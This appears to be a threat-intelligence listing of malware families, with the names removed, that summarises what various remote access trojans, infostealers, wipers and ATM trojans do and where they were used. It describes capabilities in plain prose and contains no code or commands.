A remote access trojan based on the leaked source code of the Ammyy Admin version 3 that provides threat actors with full control over their victims' systems.
A trojan malware that harvests and exfiltrates data from the compromised system. It is installed on a system via a first-stage malware
A trojan that creates a VBscript file that contains a path to an executable. Once a connection is made, there are three commands that the trojan can run on the infected system: Run Command, Upload a file, and Download a specified file.
A remote access trojan that persists on affected computers with full system access. It can spawn new remote desktop sessions, take screen captures and assemble them into a live stream of the affected desktop, start and kill processes on the target system, and can search, download, upload, and execute files.
A backdoor that uses raw sockets to create a reverse-shell with full network encryption and integrity checks.
The opening ceremony of the Winter Olympics held in Pyeongchang, South Korea was disrupted by a cyber-attack caused by the Olympic Destroyer trojan designed to destroy data. This trojan caused faulty Wi-Fi connections, disrupted television and internet services, and knocked the main press center offline.
A remote access trojan that uses cloud apps to deliver malicious Windows script component scriplet files that are appended with a .sct extension.
A remote access trojan that can log user keystrokes, copy the clipboard, delete files, compress files, clear event logs, shut down the machine, and more.
A Koran-language trojan used for reconnaissance and can collect detailed information about the victim's system including content on the user's hard drive.
a Korean-language trojan first observed in mid-December 2017 that gathers detailed logs about the victim's configuration, contents of the hard drive, registry, scheduled tasks, running processes, and more.
A data-gathering trojan used as a first-stage reconnaissance tool and downloader for additional malicious payloads.
A remote access trojan developed using original code and used by only one threat actor and has been used to target Ukrainian users.
A .NET framework open-source remote access trojan family used in cyber-criminal and cyber-espionage campaigns to target Windows operating system devices.
An information-stealing trojan for sale on criminal forums for 1,500 Rubles - or about $27 - and is being distributed in the wild. It can steal browser cookies, stored credentials, and monitor the Windows clipboard for certain text and, if detected, can modify that text.
A small application used to download other malware onto victim machines; it is often distributed via spam campaigns and exploit kits.
A malware variant designed to wipe data from hard drives. Used by the cyber-espionage group Sandworm team.
A remote access trojan (RAT) and infostealer created using the open-source software LaZagne that follows mouse movements and clicks, logs keystrokes, records the output of the webcam and screen, and obtains credentials stored inside the system. It is available for purchase on a Tor network site.
A trojan used to target Wincor Nixdorf ATMs and empty the machines of all their banknotes.
ATM trojan malware used against a Brazilian bank's ATMs to steal customer's bank card numbers and account security codes.
A remote access trojan (RAT) that targets personnel and organizations related to South Korea or the video games industry, distributes malware through Google Drive, obtains its C2 address from GitHub, and uses Microsoft Windows Background Intelligence Transfer Service (BITS) to maintain persistence.